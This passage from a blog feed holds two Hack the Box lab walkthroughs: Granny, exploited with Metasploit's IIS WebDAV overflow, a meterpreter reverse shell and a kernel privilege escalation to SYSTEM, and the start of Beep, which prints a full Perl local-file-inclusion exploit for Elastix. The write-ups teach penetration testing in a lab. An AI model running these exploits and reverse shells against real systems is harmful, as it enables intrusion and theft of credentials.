80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Error
| http-webdav-scan: 
|   Server Type: Microsoft-IIS/6.0
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   WebDAV type: Unknown
|_  Server Date: Sat, 08 May 2021 08:13:22 GMT
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May  8 01:11:48 2021 -- 1 IP address (1 host up) scanned in 25.44 seconds
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You can see that Microsoft IIS httpd 6.0 is running.&lt;br&gt;
I'll search for it in Metasploit.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ msfconsole   

  +-------------------------------------------------------+
  |  METASPLOIT by Rapid7                                 |
  +---------------------------+---------------------------+
  |      __________________   |                           |
  |  ==c(______(o(______(_()  | |""""""""""""|======[***  |
  |             )=\           | |  EXPLOIT   \            |
  |            // \\          | |_____________\_______    |
  |           //   \\         | |==[msf &amp;gt;]============\   |
  |          //     \\        | |______________________\  |
  |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |
  |        //         \\      |  *********************    |
  +---------------------------+---------------------------+
  |      o O o                |        \'\/\/\/'/         |
  |              o O          |         )======(          |                                                     
  |                 o         |       .'  LOOT  '.        |                                                     
  | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |                                                     
  | |    PAYLOAD     |""\___, |     /    (_||_     \      |                                                     
  | |________________|__|)__| |    |     __||_)     |     |                                                     
  | |(@)(@)"""**|(@)(@)**|(@) |    "       ||       "     |                                                     
  |  = = = = = = = = = = = =  |     '--------------'      |                                                     
  +---------------------------+---------------------------+                                                     


       =[ metasploit v6.0.40-dev                          ]
+ -- --=[ 2119 exploits - 1138 auxiliary - 360 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: Adapter names can be used for IP params 
set LHOST eth0

msf6 &amp;gt; search iis 6.0

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  exploit/windows/firewall/blackice_pam_icq            2004-03-18       great   No     ISS PAM.dll ICQ Parser Buffer Overflow
   1  auxiliary/dos/windows/http/ms10_065_ii6_asp_dos      2010-09-14       normal  No     Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service
   2  exploit/windows/iis/iis_webdav_scstoragepathfromurl  2017-03-26       manual  Yes    Microsoft IIS WebDav ScStoragePathFromUrl Overflow


Interact with a module by name or index. For example info 2, use 2 or use exploit/windows/iis/iis_webdav_scstoragepathfromurl   
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h1&gt;
  
  
  Exploit
&lt;/h1&gt;

&lt;p&gt;I found it, set the IP addresses and the other options, and ran it.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;msf6 &amp;gt; use 2
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) &amp;gt; show options

Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):                                           

   Name           Current Setting  Required  Description                                                        
   ----           ---------------  --------  -----------                                                        
   MAXPATHLENGTH  60               yes       End of physical path brute force                                   
   MINPATHLENGTH  3                yes       Start of physical path brute force                                 
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]       
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syn  
                                             tax 'file:&amp;lt;path&amp;gt;'                                                  
   RPORT          80               yes       The target port (TCP)                                              
   SSL            false            no        Negotiate SSL/TLS for outgoing connections                         
   TARGETURI      /                yes       Path of IIS 6 web application
   VHOST                           no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.20.10.2      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2 SP2 x86


msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) &amp;gt; set rhost 10.10.10.15
rhost =&amp;gt; 10.10.10.15
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) &amp;gt; set lhost 10.10.14.5
lhost =&amp;gt; 10.10.14.5
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) &amp;gt; check
[+] 10.10.10.15:80 - The target is vulnerable.
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) &amp;gt; run

[*] Started reverse TCP handler on 10.10.14.5:4444 
[*] Trying path length 3 to 60 ...
[*] Sending stage (175174 bytes) to 10.10.10.15
[*] Meterpreter session 1 opened (10.10.14.5:4444 -&amp;gt; 10.10.10.15:1030) at 2021-05-10 03:24:21 -0700             

meterpreter &amp;gt;                                      
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The intrusion was successful.&lt;/p&gt;

&lt;h1&gt;
  
  
  PE
&lt;/h1&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;meterpreter &amp;gt; getuid                                                                                            
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.    
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I try to check which user I am running as, but I can't even do that.&lt;br&gt;
Let's check the process list.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;meterpreter &amp;gt; ps                                                                                                

Process List                                                                                                    
============                                                                                                    

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System
 272   4     smss.exe
 324   272   csrss.exe
 348   272   winlogon.exe
 396   348   services.exe
 408   348   lsass.exe
 596   396   svchost.exe
 680   396   svchost.exe
 736   396   svchost.exe
 784   396   svchost.exe
 800   396   svchost.exe
 936   396   spoolsv.exe
 964   396   msdtc.exe
 1084  396   cisvc.exe
 1124  396   svchost.exe
 1180  396   inetinfo.exe
 1216  396   svchost.exe
 1332  396   VGAuthService.exe
 1412  396   vmtoolsd.exe
 1464  396   svchost.exe
 1628  396   svchost.exe
 1732  396   dllhost.exe
 1816  396   alg.exe
 1832  596   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse
                                                                             .exe
 1900  396   dllhost.exe
 2120  396   vssvc.exe
 2176  1464  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.
                                                                             exe
 2244  596   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcd
                                                                             ata.exe
 2308  2176  rundll32.exe       x86   0                                      C:\WINDOWS\system32\rundll32.exe
 2488  596   wmiprvse.exe
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Which process am I running in?&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;meterpreter &amp;gt; getpid
Current pid: 2308
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;meterpreter &amp;gt; getpid
Current pid: 2308
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I see. I'll migrate to one of the processes running as "NT AUTHORITY\NETWORK SERVICE".&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;meterpreter &amp;gt; migrate 2244
[*] Migrating from 2308 to 2244...
[*] Migration completed successfully.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If you then check the user again, you will see that it is "NT AUTHORITY\NETWORK SERVICE".&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;meterpreter &amp;gt; getuid
Server username: NT AUTHORITY\NETWORK SERVICE
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Return to the local console for a moment to find an exploit that can be used for PE.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;meterpreter &amp;gt; background
[*] Backgrounding session 1...
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) &amp;gt; use post/multi/recon/local_exploit_suggester 
msf6 post(multi/recon/local_exploit_suggester) &amp;gt; set session 1
session =&amp;gt; 1
msf6 post(multi/recon/local_exploit_suggester) &amp;gt; run

[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 37 exploit checks are being tried...
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) &amp;gt; use exploit/windows/local/ms14_058_track_popup_menu
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms14_058_track_popup_menu) &amp;gt; show options

Module options (exploit/windows/local/ms14_058_track_popup_menu):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.20.10.2      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


msf6 exploit(windows/local/ms14_058_track_popup_menu) &amp;gt; set session 1
session =&amp;gt; 1
msf6 exploit(windows/local/ms14_058_track_popup_menu) &amp;gt; set lhost 10.10.14.5
lhost =&amp;gt; 10.10.14.5
msf6 exploit(windows/local/ms14_058_track_popup_menu) &amp;gt; run

[*] Started reverse TCP handler on 10.10.14.5:4444 
[*] Launching notepad to host the exploit...
[+] Process 1824 launched.
[*] Reflectively injecting the exploit DLL into 1824...
[*] Injecting exploit into 1824...
[*] Exploit injected. Injecting payload into 1824...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I tried "ms14_058_track_popup_menu", but it didn't work.&lt;br&gt;
Next, I try "ms14_070_tcpip_ioctl".&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;msf6 exploit(windows/local/ms14_058_track_popup_menu) &amp;gt; use exploit/windows/local/ms14_070_tcpip_ioctl
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) &amp;gt; show options

Module options (exploit/windows/local/ms14_070_tcpip_ioctl):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.20.10.2      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Server 2003 SP2


msf6 exploit(windows/local/ms14_070_tcpip_ioctl) &amp;gt; set session 1
session =&amp;gt; 1
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) &amp;gt; set lhost 10.10.14.5
lhost =&amp;gt; 10.10.14.5
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) &amp;gt; run

[*] Started reverse TCP handler on 10.10.14.5:4444 
[*] Storing the shellcode in memory...
[*] Triggering the vulnerability...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Sending stage (175174 bytes) to 10.10.10.15
[*] Meterpreter session 2 opened (10.10.14.5:4444 -&amp;gt; 10.10.10.15:1031) at 2021-05-10 03:32:40 -0700

meterpreter &amp;gt; getuid
Server username: NT AUTHORITY\SYSTEM
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;It seems to have succeeded: checking the user again shows "NT AUTHORITY\SYSTEM".&lt;br&gt;
Then follow the steps below to explore the filesystem and get the flag.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;meterpreter &amp;gt; cd /
meterpreter &amp;gt; ls
Listing: C:\
============

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   0       dir   2017-04-12 07:27:12 -0700  ADFS
100777/rwxrwxrwx  0       fil   2017-04-12 07:04:44 -0700  AUTOEXEC.BAT
100666/rw-rw-rw-  0       fil   2017-04-12 07:04:44 -0700  CONFIG.SYS
40777/rwxrwxrwx   0       dir   2017-04-12 06:42:38 -0700  Documents and Settings
40777/rwxrwxrwx   0       dir   2017-04-12 07:17:24 -0700  FPSE_search
100444/r--r--r--  0       fil   2017-04-12 07:04:44 -0700  IO.SYS
40777/rwxrwxrwx   0       dir   2017-04-12 07:16:33 -0700  Inetpub
100444/r--r--r--  0       fil   2017-04-12 07:04:44 -0700  MSDOS.SYS
100555/r-xr-xr-x  47772   fil   2007-02-18 04:00:00 -0800  NTDETECT.COM
40555/r-xr-xr-x   0       dir   2017-04-12 06:43:02 -0700  Program Files
40777/rwxrwxrwx   0       dir   2017-04-12 12:02:02 -0700  RECYCLER
40777/rwxrwxrwx   0       dir   2017-04-12 06:42:38 -0700  System Volume Information
40777/rwxrwxrwx   0       dir   2017-04-12 06:41:07 -0700  WINDOWS
100666/rw-rw-rw-  208     fil   2017-04-12 06:42:08 -0700  boot.ini
100444/r--r--r--  297072  fil   2007-02-18 04:00:00 -0800  ntldr
0000/---------    0       fif   1969-12-31 16:00:00 -0800  pagefile.sys
40777/rwxrwxrwx   0       dir   2017-04-12 07:05:06 -0700  wmpub

meterpreter &amp;gt; cd Documents\ and\ Settings 
meterpreter &amp;gt; ls
Listing: C:\Documents and Settings
==================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40777/rwxrwxrwx  0     dir   2017-04-12 07:12:15 -0700  Administrator
40777/rwxrwxrwx  0     dir   2017-04-12 06:42:38 -0700  All Users
40777/rwxrwxrwx  0     dir   2017-04-12 06:42:38 -0700  Default User
40777/rwxrwxrwx  0     dir   2017-04-12 12:19:46 -0700  Lakis
40777/rwxrwxrwx  0     dir   2017-04-12 07:08:32 -0700  LocalService
40777/rwxrwxrwx  0     dir   2017-04-12 07:08:31 -0700  NetworkService

meterpreter &amp;gt; cd Administrator 
meterpreter &amp;gt; ls
Listing: C:\Documents and Settings\Administrator
================================================

Mode              Size    Type  Last modified              Name
---------              ----    ----  -------------              ----
40555/r-xr-xr-x   0       dir   2017-04-12 07:12:15 -0700  Application Data
40777/rwxrwxrwx   0       dir   2017-04-12 07:12:15 -0700  Cookies
40777/rwxrwxrwx   0       dir   2017-04-12 07:12:15 -0700  Desktop
40555/r-xr-xr-x   0       dir   2017-04-12 07:12:15 -0700  Favorites
40777/rwxrwxrwx   0       dir   2017-04-12 07:12:15 -0700  Local Settings
40555/r-xr-xr-x   0       dir   2017-04-12 07:12:15 -0700  My Documents
100666/rw-rw-rw-  786432  fil   2017-04-12 07:12:15 -0700  NTUSER.DAT
40777/rwxrwxrwx   0       dir   2017-04-12 07:12:15 -0700  NetHood
40777/rwxrwxrwx   0       dir   2017-04-12 07:12:15 -0700  PrintHood
40555/r-xr-xr-x   0       dir   2017-04-12 07:12:15 -0700  Recent
40555/r-xr-xr-x   0       dir   2017-04-12 07:12:15 -0700  SendTo
40555/r-xr-xr-x   0       dir   2017-04-12 07:12:15 -0700  Start Menu
100666/rw-rw-rw-  0       fil   2017-04-12 07:12:15 -0700  Sti_Trace.log
40777/rwxrwxrwx   0       dir   2017-04-12 07:12:15 -0700  Templates
40777/rwxrwxrwx   0       dir   2017-04-12 11:48:10 -0700  UserData
100666/rw-rw-rw-  1024    fil   2017-04-12 07:12:15 -0700  ntuser.dat.LOG
100666/rw-rw-rw-  178     fil   2017-04-12 07:12:15 -0700  ntuser.ini

meterpreter &amp;gt; cd Desktop 
lmeterpreter &amp;gt; ls
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode              Size  Type  Last modified              Name
---------              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-04-12 07:28:50 -0700  root.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h1&gt;
  
  
  Incidentally
&lt;/h1&gt;

&lt;p&gt;If you try the PE exploit without first migrating out of the original process, you will get the following.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;msf6 exploit(windows/local/ms14_070_tcpip_ioctl) &amp;gt; set lhost 10.10.14.5
lhost =&amp;gt; 10.10.14.5
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) &amp;gt; set session 1
session =&amp;gt; 1
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) &amp;gt; run

[*] Started reverse TCP handler on 10.10.14.5:4444 
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Good night.&lt;/p&gt;

</description>
      <category>hackthebox</category>
      <category>metasploit</category>
      <category>granny</category>
      <category>cybersecurity</category>
    </item>
    <item>
      <title>【Hack the Box】Beep - Walkthrough</title>
      <dc:creator>ikkyu</dc:creator>
      <pubDate>Wed, 24 Mar 2021 02:18:56 +0000</pubDate>
      <link>https://dev.to/ikk_hck/hack-the-box-beep-walkthrough-8lg</link>
      <guid>https://dev.to/ikk_hck/hack-the-box-beep-walkthrough-8lg</guid>
      <description>&lt;p&gt;Twitter: ikk_hck&lt;/p&gt;

&lt;p&gt;From the HackTheBox&lt;br&gt;
&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4q27k8umbiry6bhn2qaf.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4q27k8umbiry6bhn2qaf.png" alt="Screenshot_2021-03-22_12-00-08"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h1&gt;
  
  
  Enumeration
&lt;/h1&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ nmap -oA nmap -sV 10.10.10.7                                                                                       130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-22 02:33 PDT
Nmap scan report for 10.10.10.7
Host is up (0.27s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
25/tcp    open  smtp       Postfix smtpd
80/tcp    open  http       Apache httpd 2.2.3
110/tcp   open  pop3?
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap?
443/tcp   open  ssl/https?
993/tcp   open  imaps?
995/tcp   open  pop3s?
3306/tcp  open  mysql?
4445/tcp  open  upnotifyp?
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
Service Info: Hosts:  beep.localdomain, 127.0.0.1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 254.95 seconds
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Access port 80.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9tg8hhg6l5uw2rg1hqga.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9tg8hhg6l5uw2rg1hqga.png" alt="Screenshot_2021-03-22_12-24-53"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Enumerate the web directories.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ gobuster dir -u https://10.10.10.7 -w /opt/SecLists/Discovery/Web-Content/raft-small-directories.txt -k
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;"-k" is an option to not validate the SSL certificate.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) &amp;amp; Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.7
[+] Threads:        10
[+] Wordlist:       /opt/SecLists/Discovery/Web-Content/raft-small-directories.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/03/22 12:10:13 Starting gobuster
===============================================================
/admin (Status: 301)
/images (Status: 301)
/modules (Status: 301)
/themes (Status: 301)
/help (Status: 301)
/var (Status: 301)
/mail (Status: 301)
/static (Status: 301)
/lang (Status: 301)
/libs (Status: 301)
/panel (Status: 301)
/configs (Status: 301)
/recordings (Status: 301)
/vtigercrm (Status: 301)
===============================================================
2021/03/22 12:50:18 Finished
===============================================================

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Let's look at "/help".&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjr9vky40vj0gqowovcjr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjr9vky40vj0gqowovcjr.png" alt="Screenshot_2021-03-22_12-29-10"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;It shows that the last backup was in 2010.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhypxtzqkjebfvdxsbhy0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhypxtzqkjebfvdxsbhy0.png" alt="Screenshot_2021-03-22_12-29-36"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Find out which version of Elastix was released in 2010 (&lt;a href="http://freshmeat.sourceforge.net/projects/elastix/releases" rel="noopener noreferrer"&gt;http://freshmeat.sourceforge.net/projects/elastix/releases&lt;/a&gt;).&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2gx1vthh0499j5jc8scw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2gx1vthh0499j5jc8scw.png" alt="Screenshot_2021-03-22_12-38-33"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We can see that the Elastix version is 2.0.&lt;/p&gt;

&lt;p&gt;Search for Elastix in Exploit-DB.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ searchsploit elastix    
------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                             |  Path
------------------------------------------------------------------------------------------- ---------------------------------
Elastix - 'page' Cross-Site Scripting                                                      | php/webapps/38078.py
Elastix - Multiple Cross-Site Scripting Vulnerabilities                                    | php/webapps/38544.txt
Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities                              | php/webapps/34942.txt
Elastix 2.2.0 - 'graph.php' Local File Inclusion                                           | php/webapps/37637.pl
Elastix 2.x - Blind SQL Injection                                                          | php/webapps/36305.txt
Elastix &amp;lt; 2.5 - PHP Code Injection                                                         | php/webapps/38091.php
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution                                     | php/webapps/18650.py
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The third one is cross-site scripting (XSS) and requires an active user. Therefore, we will use the fourth one, the local file inclusion.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ searchsploit -m 37637
  Exploit: Elastix 2.2.0 - 'graph.php' Local File Inclusion
      URL: https://www.exploit-db.com/exploits/37637
     Path: /usr/share/exploitdb/exploits/php/webapps/37637.pl
File Type: ASCII text, with CRLF line terminators

Copied to: /home/ikkyu/Desktop/beep/37637.pl
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Copy 37637.pl and look at the code.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ cat 37637.pl 
source: https://www.securityfocus.com/bid/55078/info

Elastix is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks.

Elastix 2.2.0 is vulnerable; other versions may also be affected. 

#!/usr/bin/perl -w

#------------------------------------------------------------------------------------# 
#Elastix is an Open Source Sofware to establish Unified Communications. 
#About this concept, Elastix goal is to incorporate all the communication alternatives,
#available at an enterprise level, into a unique solution.
#------------------------------------------------------------------------------------#
############################################################
# Exploit Title: Elastix 2.2.0 LFI
# Google Dork: :(
# Author: cheki
# Version:Elastix 2.2.0
# Tested on: multiple
# CVE : notyet
# romanc-_-eyes ;) 
# Discovered by romanc-_-eyes
# vendor http://www.elastix.org/

print "\t Elastix 2.2.0 LFI Exploit \n";
print "\t code author cheki   \n";
print "\t 0day Elastix 2.2.0  \n";
print "\t email: anonymous17hacker{}gmail.com \n";

#LFI Exploit: /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&amp;amp;module=Accounts&amp;amp;action

use LWP::UserAgent;
print "\n Target: https://ip ";
chomp(my $target=&amp;lt;STDIN&amp;gt;);
$dir="vtigercrm";
$poc="current_language";
$etc="etc";
$jump="../../../../../../../..//";
$test="amportal.conf%00";

$code = LWP::UserAgent-&amp;gt;new() or die "inicializacia brauzeris\n";
$code-&amp;gt;agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/".$dir."/graph.php?".$poc."=".$jump."".$etc."/".$test."&amp;amp;module=Accounts&amp;amp;action";
$res = $code-&amp;gt;request(HTTP::Request-&amp;gt;new(GET=&amp;gt;$host));
$answer = $res-&amp;gt;content; if ($answer =~ 'This file is part of FreePBX') {

print "\n read amportal.conf file : $answer \n\n";
print " successful read\n";

}
else { 
print "\n[-] not successful\n";
        }                                                  
